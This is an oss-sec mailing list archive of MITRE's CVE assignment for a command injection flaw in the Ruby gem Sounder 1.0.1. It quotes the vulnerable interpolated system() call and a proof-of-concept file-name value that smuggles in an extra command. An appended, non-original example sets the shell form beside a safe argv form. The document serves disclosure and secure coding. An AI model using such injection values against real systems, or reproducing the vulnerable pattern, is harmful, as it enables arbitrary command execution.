oss-sec mailing list archives
Re: Command Injection in Ruby Gem Sounder 1.0.1
From: cve-assign () mitre org
Date: Wed, 28 Aug 2013 23:13:25 -0400 (EDT)
Download: https://rubygems.org/gems/sounder

lib/sounder/sound.rb:

    def play
      system %{/usr/bin/afplay "#{@...e}" &}

    @file = "\"id;/usr/bin/id>/tmp/p;\""
    system %{/bin/echo "#{@...e}" }

Advisory: http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html
Use CVE-2013-5647.

--
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
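Added example, not part of the original message and not the gem's code: the interpolated single-string call pattern quoted above next to the argument-vector form that never reaches a shell, using /bin/echo as the message's second snippet does. The names `PAYLOAD`, `echo_via_shell`, `echo_via_argv`, `play_argv` and `play` are hypothetical, and the input is constructed with a harmless `echo` as the injected command.

```ruby
require 'open3'

# Constructed input, modelled on the quoting trick in the advisory's PoC but
# with a harmless echo as the injected command.
PAYLOAD = %q{"; echo INJECTED; echo "}

# Same pattern as the quoted sound.rb line: one interpolated string, which Ruby
# hands to /bin/sh -c because it contains shell metacharacters.
def echo_via_shell(file)
  out, _status = Open3.capture2(%{/bin/echo "#{file}"})
  out
end

# Hardened form: program and argument are separate parameters, so Ruby execs
# /bin/echo directly and no shell ever parses the value.
def echo_via_argv(file)
  out, _status = Open3.capture2('/bin/echo', file)
  out
end

# Hypothetical replacement for the play method (an assumption, not the gem's
# code): builds an argv and requires an existing regular file. The expanded
# absolute path cannot start with "-", so it cannot be read as an option.
def play_argv(file, player: '/usr/bin/afplay')
  path = File.expand_path(file)
  raise ArgumentError, "not a regular file: #{file.inspect}" unless File.file?(path)
  [player, path]
end

def play(file)
  pid = spawn(*play_argv(file)) # no shell; runs in the background like the original "&"
  Process.detach(pid)
end

if $PROGRAM_NAME == __FILE__
  puts "shell form: #{echo_via_shell(PAYLOAD).inspect}"
  puts "argv form:  #{echo_via_argv(PAYLOAD).inspect}"
end
```

In the shell form the embedded quotes close the surrounding pair and the text after `;` runs as its own command; in the argv form the same bytes come back as one literal argument.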
Current thread:
- Command Injection in Ruby Gem Sounder 1.0.1 Larry W. Cashdollar (Aug 27)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Henri Salo (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Larry W. Cashdollar (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 cve-assign (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Henri Salo (Aug 28)